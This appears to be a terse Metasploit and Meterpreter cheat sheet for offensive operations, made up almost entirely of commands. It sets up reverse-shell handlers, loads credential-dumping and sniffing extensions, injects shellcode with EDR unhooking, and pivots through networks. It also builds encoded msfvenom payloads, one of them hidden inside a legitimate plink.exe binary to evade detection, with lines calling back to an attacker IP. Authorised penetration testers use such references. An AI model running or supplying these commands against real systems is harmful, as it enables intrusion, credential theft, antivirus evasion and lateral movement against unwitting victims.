Meterpreter
Start
create launch file, file.rb:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST $ip
set LPORT 443
set exitfunc thread
set EnableStageEncoding True
set ExitOnSession false
exploit -jlaunch msf:
meterpreter -r script.rbCatch:
get session and load all:
load bofloader
load espia
load extapi
load incognito
load kiwi
load lanattacks
load peinjector
load powershell
load priv
load python
load sniffer
load stdapi
load unhook
load winpmem Proxy:
session -C 'run autoroute -s 10.10.10.0/24'
search socks
use 0
exploitInject Binary into memory:
use post/windows/manage/shellcode_inject
set autounhook true
set session X
set shellcode /root/shell.bin
set wait_unhook 20Pivot:
first create the named pipe pivot:
sessions -i -1
pivot add -t pipe -l <SESSION_HOST> -n msf-pipe -a x64 -p windowsCreate and send a payload to the handler
use payload/windows/x64/meterpreter/reverse_tcp
set lport <PORT>
set lhost <YOUR_HOST>
to_handlercreate smb payload
msfvenom -p windows/x64/meterpreter/reverse_named_pipe lhost=<SESSION_HOST> PIPENAME=msf-pipe --encrypt xor --encrypt-key z -f csharpexecute
meterpreter
msfconsole
XXX/shell_reverse_tcp – Not Stages
XXX/shell/reverse_tcp - Staged
Multi/handler
show adv
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
exploit -j
set AutoRunScript windows/gather/enum_logged_on_users
jobs -i 1switch transports:
transport list
transport add -t reverse_tcp -l 192.168.118.2 -p 5555
transport nextPivot :
route add 192.168.1.0/24 11
msfdb
Service postgresql start
Msfdb init
Workspace -a NEW
Workspace NEW
Db_nmap -sS -sV -Pn -n 10.11.1.0/24
Services
services -p 445 --rhosts
Hosts -S windows -R (add to current module – can also be filtered)
creds
lootmsfvenom
Powershell One-Liner:
Imbed Exe:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exeLast updated